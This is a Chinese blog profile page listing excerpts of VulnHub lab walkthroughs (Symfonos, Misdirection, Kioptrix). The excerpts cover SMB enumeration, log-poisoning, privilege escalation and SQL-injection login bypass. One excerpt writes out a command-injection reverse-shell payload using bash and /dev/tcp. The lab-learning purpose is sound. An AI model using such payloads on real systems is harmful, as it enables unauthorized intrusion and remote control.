自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(5)
  • 收藏
  • 关注

原创 Symfonos 1--VulnHub系列学习记录

纪要:知识点1.enum4linux、smbclient枚举查看smb服务 2.了解文件包含到邮件日志反弹shell,掌握smtp邮件服务写入命令,对邮件等日志文件目录需要熟悉; 3.掌握PATH变量提权1.主机发现,端口扫描2.发现139/445端口开启smb服务,运用enum4linux、smbclient枚举查看enum4linux 192.168.31.81 枚举发现共享目录anony...

2020-08-01 16:22:28 856

原创 Misdirection 1--VulnHub系列学习记录

了解openssl工具 通过 /etc/passwd 提权了解Metasploit的 Web Delivery Scrip 反弹shell了解收集非常见反弹shell命令方式

2020-07-25 12:47:31 309

原创 Digitalworld.local (Development)--VulnHub靶机学习记录

1.端口扫描2.登录8080看下,根据说明有隐藏页面,然而nikto dirb等都无法目录扫描,应该也是像页面提示说的一样被入侵检测系统拦截了,那怎么找目录呢,这就有点脑洞了,原来隐藏目录就是html_pages进入隐藏目录,接下来就是一顿翻目录了最后在/development.html目录,查看源码发现提示,进入秘密页面 /developmentsecretpage发现登录页面 ,无论输入什么都是报错,爆破注入什么的别想了,都是连接超时,smb服务爆破同样结局,看来..

2020-07-24 14:10:06 678

原创 Kioptrix: Level 1.1 (#2) -VulnHub靶机学习记录

环境:靶机:192.168.1.107 kali:192.168.106主机发现端口扫描浏览器登录80端口,发现登录页面,尝试sql注入绕过密码登录成功进入,经典ping命令,存在命令执行kali 开启监听,nc -lvp 6666, 靶机执行命令:127.0.0.1&bash -i >& /dev/tcp/192.168.1.106/6666 0>&1,反弹shell到kali攻击机成功反弹但不是root权限,开始...

2020-06-19 17:12:07 473

原创 kioptrix.level1 -VulnHub靶机学习记录

1.

2020-06-16 16:40:59 572

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除